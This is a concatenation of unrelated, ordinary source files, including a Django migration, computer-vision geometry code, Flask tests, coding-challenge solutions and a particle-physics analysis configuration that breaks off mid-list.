callback_data=user.lang.DEACTIVATE_BTN))
markup.add(types.InlineKeyboardButton(text=user.lang.EDIT_BTN,
callback_data=user.lang.EDIT_BTN),
types.InlineKeyboardButton(text=user.lang.DELETE_BTN,
callback_data=user.lang.DELETE_BTN))
else:
markup.add(types.InlineKeyboardButton(text=user.lang.BUY_FOR.format(price),
callback_data=user.lang.BUY_FOR))
self.bot.tg_bot.send_message(user.id, text=msg_text, reply_markup=markup, parse_mode="HTML")
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('emarsys_id', models.IntegerField(unique=True, null=True)),
('name', models.CharField(unique=True, max_length=1024, blank=True)),
],
options={
'ordering': ['name'],
'permissions': [('can_trigger_event', 'Can trigger emarsys events.')],
},
bases=(models.Model,),
),
migrations.CreateModel(
name='EventData',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1024)),
('kwarg_name', models.CharField(max_length=1024)),
('content_type', models.ForeignKey(to='contenttypes.ContentType', on_delete=django.db.models.deletion.CASCADE), ),
('event', models.ForeignKey(to='django_emarsys.Event', on_delete=django.db.models.deletion.CASCADE)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='EventInstance',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('recipient_email', models.CharField(max_length=1024)),
('context', models.TextField()),
('when', models.DateTimeField(auto_now_add=True)),
('source', models.CharField(max_length=1024, choices=[('automatic', 'automatic'), ('manual', 'manual')])),
('result', models.CharField(max_length=1024, blank=True)),
('result_code', models.CharField(max_length=1024, blank=True)),
('state', models.CharField(default='sending', max_length=1024, choices=[('sending', 'sending'), ('error', 'error'), ('success', 'success')])),
('event', models.ForeignKey(to='django_emarsys.Event', on_delete=django.db.models.deletion.CASCADE)),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True, on_delete=django.db.models.deletion.CASCADE)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='EventInstanceData',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(to='contenttypes.ContentType', on_delete=django.db.models.deletion.CASCADE)),
('event_data', models.ForeignKey(to='django_emarsys.EventData', on_delete=django.db.models.deletion.CASCADE)),
('event_trigger', models.ForeignKey(to='django_emarsys.EventInstance', on_delete=django.db.models.deletion.CASCADE)),
],
options={
},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name='eventinstancedata',
unique_together=set([('event_trigger', 'event_data')]),
),
migrations.AlterUniqueTogether(
name='eventdata',
unique_together=set([('event', 'kwarg_name'), ('event', 'name')]),
),
migrations.AddField(
model_name='event',
name='kwargs',
field=models.ManyToManyField(to='contenttypes.ContentType', through='django_emarsys.EventData'),
preserve_default=True,
),
]
|
#!/usr/bin/python
from pylab import *
import cv2
from scipy.optimize import leastsq
def apply_transformation_on_points(points, H):
'''
Apply the given transformation matrix on all points from input.
@coords: list of input points, each is represented by (row,col)
@return: list of points after transformation, each is represented by (row,col)
'''
l = []
for point in points:
p = array([point[0], point[1], 1.])
p = dot(H, p)
p = p / p[-1]
l.append( (p[0], p[1]) )
return l
def solve_homo_system_with_llsm(pts1, pts2):
'''
Obtain the the solution to a homogeneous linear least square problem.
@pts1,pts2: list of matching points
@return: ndarray of H
'''
n = len(pts1)
A = zeros((n,9))
for i in range(n):
x,y,w = pts1[i][0], pts1[i][1], 1.
xp,yp,wp = pts2[i][0], pts2[i][1], 1.
A[i] = [xp*x, xp*y, xp, yp*x, yp*y, yp, x, y, 1]
# Solution is the right eigenvector corresponding to the smallest eigenvalue
U, s, Vt = svd( dot(A.T, A) )
v = Vt[-1,:]
return v
def condition_fundamental_matrix(F):
'''
Condition the fundamental matrix using SVD such that it's of rank 2.
'''
U, s, Vt = svd(F)
s[-1] = 0.
D = diag(s)
F = dot( U, dot( D, Vt ) )
F = F / F[-1,-1]
return F
def get_normalization_homography_matrix():
'''
Find the homography matrix that transforms the given coordinates to zero-mean
'''
pass
def get_right_null_space(A, eps=1e-5):
'''
Return the null space vector(s) of a matrix.
'''
U, s, Vt = svd(A)
null_space = compress(s <= eps, Vt, axis=0)
return null_space.T
def get_cross_product_equiv_matrix(w):
'''
Get the skew-symmetric cross-product equivalent matrix of a vector
'''
x,y,z = w[0],w[1],w[2]
return array([[0., -z, y],
[z, 0., -x],
[-y, x, 0.]])
def triangulate_point(P, Pp, pt1, pt2):
'''
Given two corresponding points on the two image planes, return its physical coordinate.
'''
A = zeros((4,4))
A[0,:] = pt1[0] * P[2,:] - P[0,:]
A[1,:] = pt1[1] * P[2,:] - P[1,:]
A[2,:] = pt2[0] * Pp[2,:] - Pp[0,:]
A[3,:] = pt2[1] * Pp[2,:] - Pp[1,:]
# Solution is the right eigenvector corresponding to the smallest eigenvalue
U, s, Vt = svd( dot(A.T, A) )
v = Vt[-1,:]
return v / v[-1]
def triangulate_points(P, Pp, pts1, pts2):
'''
Convenience function.
'''
pts = []
for pt1,pt2 in zip(pts1,pts2):
pt = triangulate_point(P, Pp, pt1, pt2)
pts.append(pt)
return pts
def get_fundamental_matrix_from_projection(P, Pp):
'''
Extract F from the secondary canonical camera projection matrix.
'''
ep = Pp[:,3]
s = get_cross_product_equiv_matrix(ep)
F = dot( s, dot ( Pp, dot( P.T, inv( dot(P, P.T) ) ) ) )
return F / F[-1,-1]
def nonlinear_optimization(pts1, pts2, P, Pp):
'''
Optimize the secondary camera matrix in canonical configuration.
'''
nPts = len(pts1)
array_meas = hstack((array(pts1).T, array(pts2).T))
array_reprj = zeros(array_meas.shape)
p_guess = Pp.flatten()
def error_function(p):
'''
Geometric distance as cost function for LevMar.
'''
Pp = p.reshape(3,4)
array_reprj.fill(0.)
for i in range(nPts):
pt1, pt2 = pts1[i], pts2[i]
pt_world = triangulate_point(P, Pp, pt1, pt2)
pt1_reprj = dot(P, pt_world)
pt1_reprj = pt1_reprj / pt1_reprj[-1]
pt2_reprj = dot(Pp, pt_world)
pt2_reprj = pt2_reprj / pt2_reprj[-1]
array_reprj[:,i] = pt1_reprj[:2]
array_reprj[:,i+nPts] = pt2_reprj[:2]
error = array_meas - array_reprj
return error.flatten()
print "Optimizing..."
p_refined, _ = leastsq(error_function, p_guess)
Pp_refined = p_refined.reshape(3,4)
Pp_refined = Pp_refined / Pp_refined[-1,-1]
P_refined = P
return P_refined, Pp_refined
def get_epipoles(F):
'''
Given fundamental matrix, return the left and right epipole.
'''
e = get_right_null_space(F)
assert e.shape[1] == 1, "More than one left epipoles have been found."
ep = get_right_null_space(F.T)
assert ep.shape[1] == 1, "More than one right epipoles have been found."
return e/e[-1], ep/ep[-1]
def get_canonical_projection_matrices(F, ep):
'''
Given fundamental matrix and epipole of the right image plane, find both camera projection matrices.
'''
P = hstack(( eye(3), zeros((3,1)) ))
s = get_cross_product_equiv_matrix(ep)
Pp = hstack(( dot(s, F), ep ))
return P, Pp
def get_fundamental_matrix(pts1, pts2):
'''
Given point correspondences, make an initial estimate of fundamental matrix F.
'''
get_normalization_homography_matrix()
f = solve_homo_system_with_llsm(pts1, pts2)
F = f.reshape(3,3)
F = condition_fundamental_matrix(F)
return F
def get_rectification_homographies(image1, image2, pts1, pts2, e, ep, P, Pp):
'''
Find the homography matrices that align the corresponding epipolar lines to the same row.
'''
# Start with the second image first
h2, w2 = image2.shape[0], image2.shape[1]
# Translational matrix that shifts the image to be origin-centered
T1 = array([[1., 0., -w2/2.],
[0., 1., -h2/2.],
[0., 0., 1.]])
# Rotational matrix that rotates the epipole onto x-axis
theta = arctan( (ep[1] - h2/2.) / (ep[0] - w2/2.) )
# Since we want to rotate to positive x-axis
theta = -theta[0]
R = array([[cos(theta), -sin(theta), 0.],
[sin(theta), cos(theta), 0.],
[0., 0., 1.]])
# Homography that takes epipole to infinity
f = norm(array([ep[1] - h2/2., ep[0] - w2/2.]))
G = array([[1., 0., 0.],
[0., 1., 0.],
[-1./f, 0., 1.]])
# Translate back to original center
T2 = array([[1., 0., w2/2.],
[0., 1., h2/2.],
[0., 0., 1.]])
# The final homography for the second image
Hp = dot( T2, dot( G, dot(R, T1) ) )
####
# Now the first image
M = dot( Pp, dot( P.T, inv( dot(P, P.T) ) ) )
H0 = dot( Hp, M )
pts1h = apply_transformation_on_points(pts1, H0)
pts2h = apply_transformation_on_points(pts2, Hp)
# Construct inhomogeneous system
n = len(pts1)
A = zeros((n,3))
b = zeros((n,1))
for i in range(n):
xh,yh = pts1h[i][0], pts1h[i][1]
xph = pts2h[i][0]
A[i] = [xh, yh, 1.]
b[i] = xph
# h is pseudo-inverse multiplied by b
h = dot( dot( inv( dot(A.T, A) ), A.T ), b )
h = h.flatten()
# Obtain the homography for the first image
HA = array([[h[0], h[1], h[2]],
[0., 1., 0.],
[0., 0., 1.]])
H = dot(HA, H0)
return H, Hp |
from sqlalchemy import Column, Integer, String
from config import Base
class Book(Base):
__tablename__ ="book"
id = Column(Integer, primary_key=True, index=True)
title = Column(String)
description = Column(String) |
import datetime
from unittest.mock import ANY, patch
from flask import Flask
from src.api.v1.users import UserTrackListenCountsMonthly
app = Flask(__name__)
# Bypasses the @marshal_with decorator
app.config["RESTX_MASK_HEADER"] = "*"
START_TIME = "2020-01-01"
END_TIME = "2021-01-01"
@patch(
"src.api.v1.users.get_user_listen_counts_monthly",
return_value=[
{"play_item_id": 4, "timestamp": datetime.date(2022, 2, 1), "count": 10},
{"play_item_id": 1, "timestamp": datetime.date(2022, 1, 1), "count": 7},
{"play_item_id": 5, "timestamp": datetime.date(2022, 2, 1), "count": 8},
],
)
@patch(
"src.api.v1.users.success_response",
# Cache decorator expects a tuple response
side_effect=(lambda input: ({"data": input}, 200)),
)
@patch("src.api.v1.users.decode_with_abort", return_value=3)
def test_user_listen_counts_monthly_get_formats_correctly(
mock_decoder, mock_success_response, mock_get_user_listen_counts_monthly
):
expected_formatted_listen_counts = {
"2022-02-01T00:00:00 Z": {
"totalListens": 18,
"trackIds": [4, 5],
"listenCounts": [
{
"trackId": 4,
"date": "2022-02-01T00:00:00 Z",
"listens": 10,
},
{
"trackId": 5,
"date": "2022-02-01T00:00:00 Z",
"listens": 8,
},
],
},
"2022-01-01T00:00:00 Z": {
"totalListens": 7,
"trackIds": [1],
"listenCounts": [
{
"trackId": 1,
"date": "2022-01-01T00:00:00 Z",
"listens": 7,
}
],
},
}
with app.test_request_context(
"/users/3jk4l/listen_counts_monthly",
method="GET",
data={"start_time": START_TIME, "end_time": END_TIME},
):
assert UserTrackListenCountsMonthly().get("3jk4l") == (
{"data": expected_formatted_listen_counts},
200,
# Redis metrics add this empty dict
{},
)
mock_decoder.assert_called_once_with("3jk4l", ANY)
mock_get_user_listen_counts_monthly.assert_called_once_with(
{
"user_id": 3,
"start_time": START_TIME,
"end_time": END_TIME,
}
)
mock_success_response.assert_called_once_with(expected_formatted_listen_counts)
@patch("src.api.v1.users.get_user_listen_counts_monthly", return_value=[])
@patch(
"src.api.v1.users.success_response",
# Cache decorator expects a tuple response
side_effect=(lambda input: ({"data": input}, 200)),
)
@patch("src.api.v1.users.decode_with_abort", return_value=5)
def test_user_listen_counts_monthly_get_no_data(
mock_decoder, mock_success_response, mock_get_user_listen_counts_monthly
):
with app.test_request_context(
"/users/feafda/listen_counts_monthly",
method="GET",
data={"start_time": START_TIME, "end_time": END_TIME},
):
data = UserTrackListenCountsMonthly().get("feafda")
assert data == (
{"data": {}},
200,
# Redis metrics add this empty dict
{},
)
mock_decoder.assert_called_once_with("feafda", ANY)
mock_get_user_listen_counts_monthly.assert_called_once_with(
{
"user_id": 5,
"start_time": START_TIME,
"end_time": END_TIME,
}
)
mock_success_response.assert_called_once_with({})
|
"""
create by 2020-10-28 author hf
"""
import yaml, os
from common.log import Logger
logger = Logger(name="envconfig")
class GetConfig:
@classmethod
def get_project_config(cls, project="idea", data="idea", env="test"):
"""根据请求的参环境返回不同环境数据"""
path = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "\\data\\{}\\{}.yaml".format(
project, data)
logger.debug(path)
result = yaml.safe_load(open(path, encoding='utf-8'))
logger.debug(result)
return result.get("test") if env == "test" else result.get("env") if env == "env" else result.get("prodect")
if __name__ == '__main__':
GetConfig.get_project_config(env="test", project="idea", data="data")
|
#!/bin/python3
# https://www.hackerrank.com/challenges/append-and-delete/
import sys
s = input().strip()
t = input().strip()
k = int(input().strip())
if (len(s)-len(t)) % 2 != 0 and k %2 == 0: # special case
print('No')
sys.exit()
a,b = (s[:], t[:]) if len(s)>=len(t) else (t[:],s[:])
i=0
while i < len(b):
if a[i] != b[i]: break
i+=1
oper = len(a)-i + len(b[i:])
print('Yes' if oper<=k else 'No') |
from django.conf.urls import include, url
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name='home'),
path('fanatics/',views.fanatics, name='fanatics'),
path('fanaticsDetail/<int:id>',views.fanaticsDetail,name='fanaticsDetail'),
path('fanaticsDates/',views.fanaticsDates,name='fanaticsDates'),
path('reports/',views.reports,name='reports'),
path('palcos/',views.palcos,name='palcos'),
path('palcosSearch/',views.palcosSearch,name='palcosSearch'),
path('PalcoFanatic/',views.palcoFanatics,name='palcoFanatic'),
path('seat/',views.Seat,name='seat'),
path('seatOrderCategories/',views.seatOrderCategories,name='seatOrderCategories'),
] |
#https://leetcode.com/problems/two-sum-ii-input-array-is-sorted/
def twoSum(numbers,target):
l, r = 0, len(numbers)-1
while l < r:
res = numbers[l] + numbers[r]
if res == target:
return [l+1,r+1]
elif res < target:
l += 1
else:
r -= 1
def twoSum(numbers, target):
d = {}
for i in range(len(numbers)):
if target - numbers[i] in d:
return [d[target-numbers[i]]+1, i+1]
d[numbers[i]] = i
|
### *****************************************************************************************
### Usage:
###
### cmsRun B2GEdmtExtraToTTreeNtuple_cfg.py maxEvts=N sample="file:sample.root" ttreeOutputLabel="myoutput.root"
###
### Default values for the options are set:
### maxEvts = -1
### sample = 'file:B2GEDMNtupleExtra.root'
### ttreeOutputLabel = 'B2GTTreeNtuple.root'
### *****************************************************************************************
import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.VarParsing as opts
import os
useMINIAOD = True # True: Use on top of B2GAnaFW to produce TTrees, False: Use already produced B2G Edm ntuple')
if useMINIAOD:
from Analysis.B2GTTrees.b2gedmntuples_cfg import *
process.endPath = cms.EndPath()
process.skimmedPatElectrons.cut = "pt >= 5 && abs(eta) < 2.5"
process.electronUserData.eleVetoIdFullInfoMap = cms.InputTag("egmGsfElectronIDs:cutBasedElectronID-Spring15-25ns-V1-standalone-veto")
process.electronUserData.eleLooseIdFullInfoMap = cms.InputTag("egmGsfElectronIDs:cutBasedElectronID-Spring15-25ns-V1-standalone-loose")
process.electronUserData.eleMediumIdFullInfoMap = cms.InputTag("egmGsfElectronIDs:cutBasedElectronID-Spring15-25ns-V1-standalone-medium")
process.electronUserData.eleTightIdFullInfoMap = cms.InputTag("egmGsfElectronIDs:cutBasedElectronID-Spring15-25ns-V1-standalone-tight")
setupAllVIDIdsInModule(process,'RecoEgamma.ElectronIdentification.Identification.cutBasedElectronID_Spring15_25ns_V1_cff',setupVIDElectronSelection)
else:
process = cms.Process("b2gAnalysisTTrees")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.MessageLogger.categories.append('HLTrigReport')
process.MessageLogger.cerr.FwkReport.reportEvery = 1000
#process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')
#if options.globalTag != '':
# process.GlobalTag.globaltag = options.globalTag
#else:
# from Configuration.AlCa.GlobalTag import GlobalTag as customiseGlobalTag
# process.GlobalTag = customiseGlobalTag(process.GlobalTag, globaltag = 'auto:run2_mc')
# print "Automatically selected GlobalTag: "+str(process.GlobalTag.globaltag)
options = opts.VarParsing('analysis')
options.register('sample',
'file:B2GEDMNtuple.root',
opts.VarParsing.multiplicity.singleton,
opts.VarParsing.varType.string,
'Sample to analyze')
options.register('outputLabel',
'B2GTTreeNtupleExtra.root',
opts.VarParsing.multiplicity.singleton,
opts.VarParsing.varType.string,
'Output label')
options.register('isData',
True,
opts.VarParsing.multiplicity.singleton,
opts.VarParsing.varType.bool,
'Is data?')
options.register('isFastSim',
False,
opts.VarParsing.multiplicity.singleton,
opts.VarParsing.varType.bool,
'Is FastSim?')
#options.register('globalTag',
# '',
# opts.VarParsing.multiplicity.singleton,
# opts.VarParsing.varType.string,
# 'GlobalTag (empty = auto)')
options.register('xsec',
0,# default value: 0
opts.VarParsing.multiplicity.singleton,
opts.VarParsing.varType.float,
'Cross section (with k-factor applied, in units of pb)')
options.register('Era',
'Spring16_25nsV6',
opts.VarParsing.multiplicity.singleton,
opts.VarParsing.varType.string,
'Directory, where the JEC text files are lcoated')
options.register('usePrivateSQLite',
False,
opts.VarParsing.multiplicity.singleton,
opts.VarParsing.varType.bool,
'Take Corrections from private SQL file')
options.register('runOnGrid',
True,
opts.VarParsing.multiplicity.singleton,
opts.VarParsing.varType.bool,
'Specify whether you are running on grid, for private test set to False')
options.register('lheLabel',
"",
opts.VarParsing.multiplicity.singleton,
opts.VarParsing.varType.string,
'LHE module label, MC sample specific. Can be: externalLHEProducer')
options.register('genHtFilter',
False,
opts.VarParsing.multiplicity.singleton,
opts.VarParsing.varType.bool,
'Specify whether you want to add a gen-level HT Filter (for unbinned TTJets sample)')
options.parseArguments()
### Output Report
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(False) )
### Number of maximum events to process
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(options.maxEvents) )
### Source file
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(options.sample)
)
# TTree code specific options
ttreeOutputLabel = options.outputLabel
isData = ("Data" in options.DataProcessing) if useMINIAOD else options.isData
isFastSim = ("FastSim" in options.DataProcessing) if useMINIAOD else options.isFastSim
runOnGrid = True
usePrivateSQLite = False
if useMINIAOD:
Era = ""
if options.usePrivateSQLite:
usePrivateSQLite = True
Era = jec_era
else:
Era = options.Era + ("_DATA" if isData else "_MC")
JECloc = Era if runOnGrid else os.environ['CMSSW_BASE']+'/src/Analysis/B2GAnaFW/test/'+Era
lheLabel = "externalLHEProducer"
genHtFilter = False
### Output file
process.TFileService = cms.Service("TFileService", fileName = cms.string(ttreeOutputLabel))
### B2GEdmExtraVarProducer
from Analysis.B2GAnaFW.b2gedmntuples_cff import metFull, metFullClean, puppimetFull, genPart, electrons, muons, photons, photonjets, jetsAK4CHS, jetsAK4Puppi, jetsAK8CHS, jetsAK8Puppi, subjetsAK8CHS, subjetsAK8Puppi, genJetsAK8, genJetsAK8SoftDrop, eventInfo # metNoHF off since 76X
# import DB content from sqlite
if usePrivateSQLite and not useMINIAOD:
from CondCore.DBCommon.CondDBSetup_cfi import *
process.jec = cms.ESSource("PoolDBESSource",CondDBSetup,
connect = cms.string( "sqlite_file:"+JECloc+".db" ),
toGet = cms.VPSet(
cms.PSet(
record = cms.string("JetCorrectionsRecord"),
tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK4PF"),
label= cms.untracked.string("AK4PF")
),
cms.PSet(
record = cms.string("JetCorrectionsRecord"),
tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK4PFchs"),
label= cms.untracked.string("AK4PFchs")
),
cms.PSet(
record = cms.string("JetCorrectionsRecord"),
tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK4PFPuppi"),
label= cms.untracked.string("AK4PFPuppi")
),
cms.PSet(
record = cms.string("JetCorrectionsRecord"),
tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK8PF"),
label= cms.untracked.string("AK8PF")
),
cms.PSet(
record = cms.string("JetCorrectionsRecord"),
tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK8PFchs"),
label= cms.untracked.string("AK8PFchs")
),
cms.PSet(
record = cms.string("JetCorrectionsRecord"),
tag = cms.string("JetCorrectorParametersCollection_"+Era+"_AK8PFPuppi"),
label= cms.untracked.string("AK8PFPuppi")
),
)
)
process.es_prefer_jec = cms.ESPrefer("PoolDBESSource",'jec')
# Revert back to CHS - 22 December 2016
usePuppiJets = False # Also make sure B2GTTreeMaker_cff.py is consistent
usePuppiMet = False # Used for Razor calculation
if usePuppiJets:
AK4_label = "jetsAK4Puppi"
AK4_prefix = "jetAK4Puppi"
AK4_key = "jetKeysAK4Puppi"
AK8_label = "jetsAK8Puppi"
AK8_prefix = "jetAK8Puppi"
AK8_key = "jetKeysAK8Puppi"
AK8sub_label = "subjetsAK8Puppi"
AK8sub_prefix = "subjetAK8Puppi"
AK8sub_key = "subjetKeysAK8Puppi"
else:
AK4_label = "jetsAK4CHS"
AK4_prefix = "jetAK4CHS"
AK4_key = "jetKeysAK4CHS"
AK8_label = "jetsAK8CHS"
AK8_prefix = "jetAK8CHS"
AK8_key = "jetKeysAK8CHS"
AK8sub_label = "subjetsAK8CHS"
AK8sub_prefix = "subjetAK8CHS"
AK8sub_key = "subjetKeysAK8CHS"
if usePuppiMet:
met_label = "puppimetFull"
met_prefix = puppimetFull.prefix
else:
met_label = "metFullClean"
met_prefix = metFullClean.prefix
process.extraVar = cms.EDProducer("B2GEdmExtraVarProducer",
isData = cms.untracked.bool(isData),
isFastSim = cms.untracked.bool(isFastSim),
lhe_label = cms.untracked.string(lheLabel),
filter_label = cms.untracked.string("METUserData"),
trigger_label = cms.untracked.string("TriggerUserData"),
evt_label = cms.untracked.string("eventUserData"),
evt_prefix = cms.untracked.string(""),
vtx_label = cms.untracked.string("vertexInfo"),
vtx_prefix = cms.untracked.string(""),
met_label = cms.untracked.string(met_label),
met_prefix = met_prefix,
gen_label = cms.untracked.string("genPart"),
gen_prefix = genPart.prefix,
electrons_label = cms.untracked.string("electrons"),
electrons_prefix = electrons.prefix,
muons_label = cms.untracked.string("muons"),
muons_prefix = muons.prefix,
AK4Jets_label = cms.untracked.string(AK4_label),
AK4Jets_prefix = cms.untracked.string(AK4_prefix),
AK4JetKeys_label = cms.untracked.string(AK4_key),
AK8Jets_label = cms.untracked.string(AK8_label),
AK8Jets_prefix = cms.untracked.string(AK8_prefix),
AK8JetKeys_label = cms.untracked.string(AK8_key),
AK8Subjets_label = cms.untracked.string(AK8sub_label),
AK8Subjets_prefix = cms.untracked.string(AK8sub_prefix),
AK8SubjetKeys_label = cms.untracked.string(AK8sub_key),
singleI = cms.untracked.vstring(
# Event filters (these are automatically picked up)
"Flag_HBHENoiseFilter",
"Flag_HBHENoiseIsoFilter",
"Flag_CSCTightHaloFilter",
"Flag_CSCTightHaloTrkMuUnvetoFilter",
"Flag_CSCTightHalo2015Filter",
"Flag_globalTightHalo2016Filter",
"Flag_globalSuperTightHalo2016Filter",
"Flag_HcalStripHaloFilter",
"Flag_hcalLaserEventFilter",
"Flag_EcalDeadCellTriggerPrimitiveFilter",
"Flag_EcalDeadCellBoundaryEnergyFilter",
"Flag_goodVertices",
"Flag_eeBadScFilter",
"Flag_ecalLaserCorrFilter",
"Flag_trkPOGFilters",
"Flag_chargedHadronTrackResolutionFilter",
"Flag_muonBadTrackFilter",
"Flag_trkPOG_manystripclus53X",
"Flag_trkPOG_toomanystripclus53X",
"Flag_trkPOG_logErrorTooManyClusters",
"Flag_METFilters",
"Flag_badMuons",
"Flag_duplicateMuons",
"Flag_noBadMuons",
# Add trigger names below (these are automatically picked up)
# Photon
"HLT_Photon175",
# Single Jet
# "HLT_PFJet40",
# "HLT_PFJet60",
# "HLT_PFJet80",
# "HLT_PFJet140",
# "HLT_PFJet200",
# "HLT_PFJet260",
# "HLT_PFJet320",
# "HLT_PFJet400",
# "HLT_PFJet450",
# "HLT_PFJet500",
# "HLT_AK8PFJet40",
# "HLT_AK8PFJet60",
# "HLT_AK8PFJet80",
# "HLT_AK8PFJet140",
# "HLT_AK8PFJet200",
# "HLT_AK8PFJet260",
# "HLT_AK8PFJet320",
# "HLT_AK8PFJet360_TrimMass30",
# "HLT_AK8PFJet400_TrimMass30",
# "HLT_AK8PFJet400",
# "HLT_AK8PFJet450",
# "HLT_AK8PFJet500",
# HT
# "HLT_PFHT125",
# "HLT_PFHT200",
# "HLT_PFHT250",
# "HLT_PFHT300",
# "HLT_PFHT350",
# "HLT_PFHT400",
# "HLT_PFHT475",
# "HLT_PFHT600",
# "HLT_PFHT650",
# "HLT_PFHT800",
# "HLT_PFHT900",
# "HLT_AK8PFHT650_TrimR0p1PT0p03Mass50",
# "HLT_AK8PFHT700_TrimR0p1PT0p03Mass50",
# "HLT_AK8PFHT750_TrimMass50",
# "HLT_AK8PFHT800_TrimMass50",
# "HLT_PFHT550_4JetPt50",
# "HLT_PFHT650_4JetPt50",
# "HLT_PFHT750_4JetPt50",
# "HLT_PFHT750_4JetPt70",
# "HLT_PFHT750_4JetPt80",
# "HLT_PFHT800_4JetPt50",
# "HLT_PFHT850_4JetPt50",
# 2 AK8 Jet
# "HLT_AK8DiPFJet250_200_TrimMass30",
# "HLT_AK8DiPFJet280_200_TrimMass30",
# "HLT_AK8DiPFJet300_200_TrimMass30",
# MET
# "HLT_MET100",
# "HLT_MET150",
# "HLT_MET200",
# "HLT_MET250",
# "HLT_MET300",
# "HLT_MET600",
# "HLT_MET700",
# "HLT_PFMET170_BeamHaloCleaned",
# "HLT_PFMET170_HBHECleaned",
# "HLT_PFMET170_HBHE_BeamHaloCleaned",
# "HLT_PFMET170_JetIdCleaned",
# "HLT_PFMET170_NoiseCleaned",
# "HLT_PFMET170_NotCleaned",
# "HLT_PFMETTypeOne190_HBHE_BeamHaloCleaned",
# "HLT_PFMET300",
# "HLT_PFMET400",
# "HLT_PFMET500",
# "HLT_PFMET600",
# MHT
# "HLT_CaloMHTNoPU90_PFMET90_PFMHT90_IDTight_BTagCSV_p067",
# "HLT_CaloMHTNoPU90_PFMET90_PFMHT90_IDTight",
# "HLT_PFMET100_PFMHT100_IDTight_BeamHaloCleaned",
# "HLT_PFMET100_PFMHT100_IDTight",
# "HLT_PFMET110_PFMHT110_IDTight",
# "HLT_PFMET120_PFMHT120_IDTight",
# "HLT_PFMET90_PFMHT90_IDTight",
# "HLT_PFMETNoMu100_PFMHTNoMu100_IDTight",
# "HLT_PFMETNoMu110_PFMHTNoMu110_IDTight",
# "HLT_PFMETNoMu120_PFMHTNoMu120_IDTight",
# "HLT_PFMETNoMu90_PFMHTNoMu90_IDTight",
# Single Mu
"HLT_Mu17",
"HLT_Mu20",
"HLT_Mu27",
"HLT_Mu50",
"HLT_Mu55",
"HLT_TkMu17",
"HLT_TkMu20",
"HLT_TkMu27",
"HLT_TkMu50",
"HLT_IsoMu18",
"HLT_IsoMu20",
"HLT_IsoMu22",
"HLT_IsoMu24",
"HLT_IsoMu27",
"HLT_IsoTkMu18",
"HLT_IsoTkMu20",
"HLT_IsoTkMu22",
"HLT_IsoTkMu24",
"HLT_IsoTkMu27",
# Single Ele
"HLT_Ele17_CaloIdL_GsfTrkIdVL",
"HLT_Ele22_eta2p1_WPLoose_Gsf",
"HLT_Ele23_WPLoose_Gsf",
"HLT_Ele24_eta2p1_WPLoose_Gsf",
"HLT_Ele25_WPTight_Gsf",
"HLT_Ele25_eta2p1_WPLoose_Gsf",
"HLT_Ele25_eta2p1_WPTight_Gsf",
"HLT_Ele27_WPLoose_Gsf",
"HLT_Ele27_WPTight_Gsf",
"HLT_Ele27_eta2p1_WPLoose_Gsf",
"HLT_Ele27_eta2p1_WPTight_Gsf",
"HLT_Ele30_WPTight_Gsf",
"HLT_Ele30_eta2p1_WPLoose_Gsf",
"HLT_Ele30_eta2p1_WPTight_Gsf",
"HLT_Ele32_WPTight_Gsf",
"HLT_Ele32_eta2p1_WPLoose_Gsf",
"HLT_Ele32_eta2p1_WPTight_Gsf",
"HLT_Ele35_WPLoose_Gsf",
"HLT_Ele45_WPLoose_Gsf",
"HLT_Ele105_CaloIdVT_GsfTrkIdT",
"HLT_Ele115_CaloIdVT_GsfTrkIdT",
"HLT_Ele145_CaloIdVT_GsfTrkIdT",
"HLT_Ele200_CaloIdVT_GsfTrkIdT",
"HLT_Ele250_CaloIdVT_GsfTrkIdT",
"HLT_Ele300_CaloIdVT_GsfTrkIdT",
#Lepton + 1 Jet
"HLT_Ele50_CaloIdVT_GsfTrkIdT_PFJet165",
# Lepton + 2 Jet
"HLT_Mu30_eta2p1_PFJet150_PFJet50",
"HLT_Mu40_eta2p1_PFJet200_PFJet50",
"HLT_Ele35_CaloIdVT_GsfTrkIdT_PFJet150_PFJet50",
"HLT_Ele45_CaloIdVT_GsfTrkIdT_PFJet200_PFJet50",
# end of triggers
# Event variables
"evt_NGoodVtx",
"evt_LHA_PDF_ID",
"evt_NIsoTrk",
),
singleF = cms.untracked.vstring(
# "evt_MR",
# "evt_MTR",
# "evt_R",
# "evt_R2",
# "evt_MR_Smear",
"MC_part1_factor",
"MC_part1_ID",
"MC_part2_factor",
"MC_part2_ID",
"MC_t_pt",
"MC_t_eta",
"MC_t_phi",
"MC_t_E",
"MC_tbar_pt",
"MC_tbar_eta",
"MC_tbar_phi",
"MC_tbar_E",
"MC_lep_pt",
"MC_lep_eta",
"MC_lep_phi",
"MC_lep_E",
"MC_lep_ID",
"MC_nu_pt",
"MC_nu_eta",
"MC_nu_phi",
"MC_nu_E",
"MC_lepb_pt",
"MC_lepb_eta",
"MC_lepb_phi",
"MC_lepb_E",
"MC_hadW_pt",
"MC_hadW_eta",
"MC_hadW_phi",
